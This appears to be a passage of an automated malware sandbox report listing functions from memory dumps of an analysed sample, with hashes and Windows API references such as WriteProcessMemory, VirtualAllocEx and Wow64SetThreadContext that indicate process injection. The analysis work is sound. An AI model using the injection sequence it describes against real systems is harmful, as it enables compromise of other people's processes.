Instruction Fuzzy Hash: FDC13670D0426D8FCB24DFA4C941BEDBBB1BF49308F0091A9E959B7240DB719A86CF95

Uniqueness

Uniqueness Score: -1.00%

Function 002C4051 Relevance: 1.8, Strings: 1, Instructions: 530
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

~, xrefs: 002C41F9

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: e2b8452f6f624c42ac3b058b0249afafccbe6f45fc3885d8f7ba2d17a6941984
Instruction ID: 1533c210069240f84bdfe3ba127a3213df6e19564cf1223157d73151f7a6f682
Opcode Fuzzy Hash: e2b8452f6f624c42ac3b058b0249afafccbe6f45fc3885d8f7ba2d17a6941984
Instruction Fuzzy Hash: 7942CE75A10218CFCB15DF98C990E99BBB2FF49314F1581D9EA09AB222C731ED91DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6E48 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00EC6F1B

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 0b10fd215fd402dba859a6ff542e57af2a1443a236f8fea8c868f2cfdb5ec546
Instruction ID: 269b6749ec5428a1496c1573c876c33c24821f386ce6afb59694880ad3f07ab0
Opcode Fuzzy Hash: 0b10fd215fd402dba859a6ff542e57af2a1443a236f8fea8c868f2cfdb5ec546
Instruction Fuzzy Hash: FC4199B4D012589FCF00CFA9D984AEEBBF1FB49314F20942AE814B7250D775AA56CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6FD0 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00EC708A

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c0e0dca2d218f3ab22046d4d4dfe38e3f9ccc3e1babf3acdb0b84e3af0c6b96f
Instruction ID: 87009ba1858299a3d92564d05f3c6b065cd4e3e1183dfee2502c91c8206db94b
Opcode Fuzzy Hash: c0e0dca2d218f3ab22046d4d4dfe38e3f9ccc3e1babf3acdb0b84e3af0c6b96f
Instruction Fuzzy Hash: C241A8B4D042589FCF10CFA9D884AEEFBB1BF49314F10A42AE815B7240D775A956CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6FD8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00EC708A

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: af089c4e5237859089468bf5ee15b87b5078ec894b5f610d6a4adaf2928fec43
Instruction ID: 27c0d3d60ec7eee214753b54404876434a4e7c0f43fcf018c5415fb7b25a184e
Opcode Fuzzy Hash: af089c4e5237859089468bf5ee15b87b5078ec894b5f610d6a4adaf2928fec43
Instruction Fuzzy Hash: E84196B4D042589FCF10CFA9D884AEEFBB1BB49314F10A42AE815B7240D775A956CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6CF0 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00EC6D9A

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 838cc203262085765ebd87f2480eb728540ab0f5961a5e9e5070fb5ec5eb5520
Instruction ID: de865597dbc9dd0350cd9d78b468e9bfb415861d3bdf948a0a8fca9bca22d9da
Opcode Fuzzy Hash: 838cc203262085765ebd87f2480eb728540ab0f5961a5e9e5070fb5ec5eb5520
Instruction Fuzzy Hash: 5C4199B8D042589FCF10CFA9D984ADEBBB1FF49314F10A42AE815B7200D735A916CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6AF9 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00EC6BAF

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 076ece61bb366faa3d0d36b99f5450a074784958aad0d3efd2a11e9d7f8d7230
Instruction ID: 4a44f421dbbab6def452b5805e4a4272e45e23fc4886f9465da2353caf466e71
Opcode Fuzzy Hash: 076ece61bb366faa3d0d36b99f5450a074784958aad0d3efd2a11e9d7f8d7230
Instruction Fuzzy Hash: 2941DCB4D042589FCF10CFA9D984AEEFBB1EF49314F24842AE419B7240D739A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6B00 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00EC6BAF

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6a2232b34a3c10ff19a3ecc22d73897463133c50967dfa740400e81e8e90d0dd
Instruction ID: 69473e233d45bdb703ec6001351f282eacd12eaec27aeebb91d9db0ac299f845
Opcode Fuzzy Hash: 6a2232b34a3c10ff19a3ecc22d73897463133c50967dfa740400e81e8e90d0dd
Instruction Fuzzy Hash: AA41ACB4D002589FCB14CFA9D984AEEFBB1EF49314F24942AE418B7240D779A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00EC69D8 Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00EC6A5E

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ff458f9cd616dd2e4ffe330ebae25595ce3f3234ef8cda759df41ec5d80bf027
Instruction ID: e698e29073994993ff6e92ce90465c01d7e1258a7cdbc0aad07fda9c99f53937
Opcode Fuzzy Hash: ff458f9cd616dd2e4ffe330ebae25595ce3f3234ef8cda759df41ec5d80bf027
Instruction Fuzzy Hash: 2831AAB4D01218AFCF14CFA9E984ADEFBB5EF49314F14942AE815B7200D775A902CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EC69E0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00EC6A5E

Memory Dump Source

Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_ec0000_mum.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 453058e7c63292fd28119bba289af1dea0d03ec50fa157cfaafaedd0ade487b5
Instruction ID: 78012953f5bf0bf5a70e843ba0acb01b8340610a3305c0769754da51ce39a754
Opcode Fuzzy Hash: 453058e7c63292fd28119bba289af1dea0d03ec50fa157cfaafaedd0ade487b5
Instruction Fuzzy Hash: 913199B4D012189FCF14CFA9D984A9EFBB5EF49314F14942AE815B7340D775A902CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 002C62A7 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

48l, xrefs: 002C6251

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: 48l
API String ID: 0-3926459034
Opcode ID: 3aa7756629bb4540b9b5aada3e01a20b04d45172b873c7b871ee9ba1e258afde
Instruction ID: 8fcffb8073cbd777374acf3142fbf0d02c72e1297986271bbfc8ac294a5ec30a
Opcode Fuzzy Hash: 3aa7756629bb4540b9b5aada3e01a20b04d45172b873c7b871ee9ba1e258afde
Instruction Fuzzy Hash: BF51F330A24611CBDB348FA8D848BBAB7F2EF45701F14827EE86ADB291D3748C64D715

Uniqueness

Uniqueness Score: -1.00%

Function 002C5E38 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

48l, xrefs: 002C5E8A

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: 48l
API String ID: 0-3926459034
Opcode ID: b8d17a7c93f21fd13e301422d5dc176af88d4ab2b5f7cae6b0c31295ff15bcb3
Instruction ID: 10837bbb7ff2d188c80e3d816641fea1bd52d290ef2e0c84cf5f3c1644739ac4
Opcode Fuzzy Hash: b8d17a7c93f21fd13e301422d5dc176af88d4ab2b5f7cae6b0c31295ff15bcb3
Instruction Fuzzy Hash: AE41F530A20A26CFDB148FA8C855FBEB7B5FB45340F14466EE001D76A1DB74E9A0CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05126B68 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

B-z, xrefs: 05126C16

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID: B-z
API String ID: 0-1806057957
Opcode ID: 559196fb4f0d3e7849aafc2043648ac6da7fe25bd14fe1a08d1a3c78ae21b9a8
Instruction ID: 508d73af72e2a8a3d92302bf935d5b094da8c4c85cc49b4b408a87ecdfc5bad3
Opcode Fuzzy Hash: 559196fb4f0d3e7849aafc2043648ac6da7fe25bd14fe1a08d1a3c78ae21b9a8
Instruction Fuzzy Hash: 4D212A74E092298BCB18DFA9C8456EEBBB6EB89300F04942AD419B3394DF345961CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002C18D6 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

(Fl, xrefs: 002C192F

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: (Fl
API String ID: 0-3640630996
Opcode ID: 1581e99e9990c4f5063a3e34394acb0acb16ce6c452c3a878175b09c38202e6a
Instruction ID: 510d8077c2a738fabfbc7a32b414dfc32b01847099dc52bc038364fcc4438169
Opcode Fuzzy Hash: 1581e99e9990c4f5063a3e34394acb0acb16ce6c452c3a878175b09c38202e6a
Instruction Fuzzy Hash: 1A11B1323204118FC764DB79D851E6973E5EF8A75431181BAF50ACB772DA30DC618B90

Uniqueness

Uniqueness Score: -1.00%

Function 002C3DF3 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

), xrefs: 002C3E0B

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 673cf724546a0a6ab9be67d22066fdeb5556a0bd3c77346ae663f7d442b4fae7
Instruction ID: 902483f32761cfea080d5e5121ae85a0ca5fc54d7bf237533b0c8b5b28ee470b
Opcode Fuzzy Hash: 673cf724546a0a6ab9be67d22066fdeb5556a0bd3c77346ae663f7d442b4fae7
Instruction Fuzzy Hash: 32D05B3015520CEFD714DFA5D808FA977ACEB06305F145B98A40A53551C7B45E31DFD5

Uniqueness

Uniqueness Score: -1.00%

Function 002C9B00 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

2, xrefs: 002C9B13

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 98317b7142177798ae5fb294a22afe56c307d4de19219facab1bcbd38123bd8f
Instruction ID: 6dc91d7b6471a7fd793f5df58ae198c025a3981e6c44d342855a503f8d2e0ef1
Opcode Fuzzy Hash: 98317b7142177798ae5fb294a22afe56c307d4de19219facab1bcbd38123bd8f
Instruction Fuzzy Hash: 0CD0A7305AA108F6CA00DBA5E809FAA736CC701309F101B5C9409231518AB01F60EE81

Uniqueness

Uniqueness Score: -1.00%

Function 002C4D70 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

M, xrefs: 002C4D83

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7f043fa9d6aff93343ab68b6c1740b355f181fe0d66df58200b0c4ec302786bb
Instruction ID: 6c1ceaf5235d625c04315e6c5be356cc890b6179056b8cecae7f421c57789187
Opcode Fuzzy Hash: 7f043fa9d6aff93343ab68b6c1740b355f181fe0d66df58200b0c4ec302786bb
Instruction Fuzzy Hash: ACD0A730469108E7D600FBE5D815FBF776C8B02705F100A8C950B539518AF40F20DAC5

Uniqueness

Uniqueness Score: -1.00%

Function 002C3DF8 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

), xrefs: 002C3E0B

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: )
API String ID: 0-2427484129
Opcode ID: 3b8ec00a030f796b073ea0c36fde9f4092496f40a26d6f114a22002dd3453169
Instruction ID: 1cd754a6860247246a10f97276c0ff70f62eca770d7efa8ff5b0c8fa973218ee
Opcode Fuzzy Hash: 3b8ec00a030f796b073ea0c36fde9f4092496f40a26d6f114a22002dd3453169
Instruction Fuzzy Hash: 1DD05E30119208EBD604DBA5D808BA9B76C9B06306F144658A40A5325187B40E30ABD5

Uniqueness

Uniqueness Score: -1.00%

Function 002C37A0 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c2d0cf13d842df52b5652f68d09c8510ed06e5a1877cfd7cfb43e6d494c991
Instruction ID: aeec544db989a240eac9e94d208cd8b46c6c353472488c18b7c325e3d6f24454
Opcode Fuzzy Hash: 83c2d0cf13d842df52b5652f68d09c8510ed06e5a1877cfd7cfb43e6d494c991
Instruction Fuzzy Hash: 36F1C474A002188FDB94DF68C991BDDB7B2EB89304F1084EAE90DA7355DB319E82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002C529E Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3293b71d73754140dfb29e6536aae1de8181521fd4068ddd56f11f92f1d4bd6d
Instruction ID: 76bb62fa7b38b3405269aee7417e2441b3031d86aa804568dd6920d827285ff6
Opcode Fuzzy Hash: 3293b71d73754140dfb29e6536aae1de8181521fd4068ddd56f11f92f1d4bd6d
Instruction Fuzzy Hash: 8981E774A142188FDB50DFA8C881B9DBBF6FB49314F2481A9D919AB346D731ED82CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002C6E20 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57eb403a3b00ef097b89b39059a3f3c1c38eb025138b5189051bb672d7fdaad3
Instruction ID: d544647518f0443cf63f7667f04a36977da652665fddff172f1a739db60644fd
Opcode Fuzzy Hash: 57eb403a3b00ef097b89b39059a3f3c1c38eb025138b5189051bb672d7fdaad3
Instruction Fuzzy Hash: B2516B70A24619CBCB04CF64C545FAEF7B2EF44305F14862AE456AB292C774E860CB91

Uniqueness

Uniqueness Score: -1.00%

Function 002C69D9 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7a549a104beca942c326f28dc02c6ff9ccc628b94c1a751a9755a35de30ffc
Instruction ID: 0c1bab77a150948cdc9c73fc3af31e5dfe611de010bb947501a99ab764540ddb
Opcode Fuzzy Hash: 1e7a549a104beca942c326f28dc02c6ff9ccc628b94c1a751a9755a35de30ffc
Instruction Fuzzy Hash: A371C574A002198FDB55CF98C881FAAB7B2FF49304F148599E919AB356CB31EE41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002C5048 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdcaa079ba7dab17316958b515f5717377644d212250c0feb2b3042a8020e3d2
Instruction ID: e8e5ae5da133f30a337061853e74da264de424ead3185e25b9c118802e79f854
Opcode Fuzzy Hash: fdcaa079ba7dab17316958b515f5717377644d212250c0feb2b3042a8020e3d2
Instruction Fuzzy Hash: CC418174D25629DFCB00CFA8D984AEDBBF4AB0D300F245669D819F3300E771AA919F54

Uniqueness

Uniqueness Score: -1.00%

Function 002C5278 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676b870b70cafa5ced2724449b6b8e7fb4ca9e35da3fe5954f1c00eae86819e9
Instruction ID: 51c7ac71e680bc19a30dd9645404ee2bd927ed98e609c8fd44c635f8c7dadf57
Opcode Fuzzy Hash: 676b870b70cafa5ced2724449b6b8e7fb4ca9e35da3fe5954f1c00eae86819e9
Instruction Fuzzy Hash: 4F41D934A042189FDB50DF58CD91B99BBB6FB89314F1481E9E90D97345CB31AE82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05120F1C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5120000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45533cdb2cb6fe6104aac4182c9c83753ad9e35986991f8dd16307cd40812293
Instruction ID: 555fc52167a331d56bdf6ab4e34964a2e0b51fe6ebdb34a8fe11be17e19f2a58
Opcode Fuzzy Hash: 45533cdb2cb6fe6104aac4182c9c83753ad9e35986991f8dd16307cd40812293
Instruction Fuzzy Hash: 9241F07498A268CFEF64DF24CC4C7AABBB2BB48302F1081E9D40DA6250DB755A95CF04

Uniqueness

Uniqueness Score: -1.00%

Function 002C4A53 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa6adf726f73d95bba25fe3405dfc217fb8726132f88f7fd14fb046fd58f2f02
Instruction ID: 0bde1d51bb354667f6bb568d6b2b08e5ddeeff152006cc167db86e9b32d483f8
Opcode Fuzzy Hash: fa6adf726f73d95bba25fe3405dfc217fb8726132f88f7fd14fb046fd58f2f02
Instruction Fuzzy Hash: AC41C274E10218DFDB50DFA8C891B9EBBB1FB49304F14819AE909A7345DB31AE868F51

Uniqueness

Uniqueness Score: -1.00%

Function 002C22B0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 834063ea4e9d77e6e3dbf1ba333e0f7cc694cd8307290e3d3135342271e695ce
Instruction ID: 9472f6744c2aaa3074e13f36d2041eba1fa2e2a881927fe11dce210b3097aef6
Opcode Fuzzy Hash: 834063ea4e9d77e6e3dbf1ba333e0f7cc694cd8307290e3d3135342271e695ce
Instruction Fuzzy Hash: AE313D70A10B46CBD770DF2AC844B6AB7F2FB84320F20872DD46A97690DB74A855CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002CA1F5 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c372725ef2dc29a9c3ba1e4a7206e445be1f67c0524a76e70f954737e9d8e4
Instruction ID: e631c0f227f2f61a0004508221f60a3f11a7ff18b6f7cc168b77b3cfb336d71c
Opcode Fuzzy Hash: e8c372725ef2dc29a9c3ba1e4a7206e445be1f67c0524a76e70f954737e9d8e4
Instruction Fuzzy Hash: 5D31E274A2421ECBDB10DF64D848BADBBF6FB48300F1056AAD40AE7254EB708E949F41

Uniqueness

Uniqueness Score: -1.00%

Function 000BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bd000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93b3af5083d33a215b66b756fc43b8cbc8c0d05fc2887b7ae974d938a84b017a
Instruction ID: 083f1fdfbc99fdfe6b78b2a1a261a20a6e60db9de1e6602e6b6df959e5442df3
Opcode Fuzzy Hash: 93b3af5083d33a215b66b756fc43b8cbc8c0d05fc2887b7ae974d938a84b017a
Instruction Fuzzy Hash: 44210475604204DFCB24EF14D884B6AFBA5FB88314F34C5AAE9094B246D33AD857CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bd000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa9faca7e18df5488d85cfc5c364a36a07731adbfeffee0b1d4d04dbbcdceae
Instruction ID: cc63e88198d15bcf0d8d71e7cea4ce813413551748eb3f7ab5706d8c656f122f
Opcode Fuzzy Hash: 8aa9faca7e18df5488d85cfc5c364a36a07731adbfeffee0b1d4d04dbbcdceae
Instruction Fuzzy Hash: DB214670604284EFCB55CF10D9C0B6AFBA5FBA8318F30C5AEE9094B242D336D856CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002C519F Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265aaa2a881e8918953a2ee696a3fc019debe129286844f7c9df2760a4c3fbef
Instruction ID: 039e82b332d33a2a1cda121eb2214a6e3e070b758a1c35ef81588905d6e5637e
Opcode Fuzzy Hash: 265aaa2a881e8918953a2ee696a3fc019debe129286844f7c9df2760a4c3fbef
Instruction Fuzzy Hash: B0219374D25619DFCB00CFAAD884AEDBBF1AF5C310F249669D809F7200E771A9919F50

Uniqueness

Uniqueness Score: -1.00%

Function 002C57C8 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d162d3f88c5840534b2cbf8e28c475a280a8f1c09b3a88c4d510b288db3cdd1
Instruction ID: e1d7663c37355dd2c0e4639bc283bca935411b2a025d9d9898cf433c57550894
Opcode Fuzzy Hash: 4d162d3f88c5840534b2cbf8e28c475a280a8f1c09b3a88c4d510b288db3cdd1
Instruction Fuzzy Hash: 7121E974E25519DFCB00CFA9D5409EEBBF5EB49300F20962AE916B3301D770A991CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002C1EE0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5c6b8a48c92c48a24bf9e7ea4f088089184b56b1752e30a44bb327e599e07e2
Instruction ID: 27c882d8bc059e3b0e6788c303c9ceaa8bd95387925d947425cd8c17744cb337
Opcode Fuzzy Hash: d5c6b8a48c92c48a24bf9e7ea4f088089184b56b1752e30a44bb327e599e07e2
Instruction Fuzzy Hash: C0119A357641504FC744EB78D498E5A3BE29FDE32531201B8E60ACB3A2EE24DC42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bd000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57df4eb4c85d0f0bd9e91e84ecc4d9573ec1417b5af9858cc1931e35c12df11
Instruction ID: 40104473497dd4fc686ae3a78296c22ae04c53bbbba696a3c6e5408349ebdcb1
Opcode Fuzzy Hash: d57df4eb4c85d0f0bd9e91e84ecc4d9573ec1417b5af9858cc1931e35c12df11
Instruction Fuzzy Hash: A1217F755083809FCB02DF14D994B11BFB1EB46314F28C5EAD8498B266D33A981ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 002C9D34 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

